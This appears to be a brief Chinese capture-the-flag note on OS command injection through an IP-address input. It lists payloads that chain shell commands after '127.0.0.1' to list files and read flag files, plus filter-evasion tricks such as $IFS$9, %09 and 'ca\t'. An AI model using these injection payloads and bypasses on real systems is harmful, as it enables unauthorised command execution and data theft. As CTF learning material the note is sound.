输入
127.0.0.1 | ls -al
查看文件
127.0.0.1 | cat [flag文件名]
用less more就行,或者ca\t
用
$IFS$9或者%09
代替空格,然后输入
127.0.0.1|cat$IFS$9lag_3760913111752.php
这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在linux下表示分隔符,只有cat$IFSa.txt的时候,bash解释器会把整个IFSa当做变量名,所以导致没有办法运行,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用,而$9指的是当前系统shell进程的第九个参数的持有者,就是一个空字符串,因此$9相当于没有加东西,等于做了一个前后隔离。
127.0.0.1;cd flag_is_here;cat flag_11132792223723.php
127.0.0.1;cat flag_209472690126349.php